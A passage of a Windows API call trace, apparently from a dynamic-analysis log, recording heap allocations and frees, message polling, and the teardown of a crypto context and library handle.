CryptDestroyKey (hKey=0xa87410) returned 1 [0240.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0240.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0240.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0240.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0240.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0240.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0240.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0240.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0240.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0240.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0240.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0240.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0240.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0240.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0240.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0240.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0240.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0240.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0240.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0240.669] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0240.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0240.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0240.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0240.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0240.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0240.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0240.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0240.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0240.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0240.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0240.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0240.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0240.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0240.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.670] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0240.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0240.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.670] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0240.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0240.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0240.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0240.670] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0240.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0240.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.670] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0240.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0240.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0240.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0240.670] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0240.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0240.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0240.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0240.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0240.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0240.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.671] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0240.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0240.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.671] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0240.671] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0240.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0240.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.671] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0240.671] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0240.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0240.707] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0240.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0240.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0240.707] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0240.708] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0240.708] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.708] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0240.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0240.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.708] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.708] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0240.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0240.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.709] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.709] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0240.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0240.709] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0240.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0240.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.709] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0240.709] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.709] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0240.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0240.709] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0240.709] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0240.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0240.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.710] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0240.710] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0240.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0240.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.710] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0240.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0240.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0240.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0240.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0240.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0240.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0240.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0240.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0240.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0240.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0240.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0240.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0240.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0240.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0240.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0240.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0240.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0240.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0240.712] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0240.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0240.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0240.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.713] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0240.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0240.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0240.713] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0240.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0240.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0240.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0240.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0240.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0240.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.713] FreeLibrary (hLibModule=0x756e0000) returned 1 [0240.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0240.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.713] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0240.713] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0240.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0240.714] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0240.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0240.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0240.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0240.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0240.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0240.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.715] CloseHandle (hObject=0x2d0) 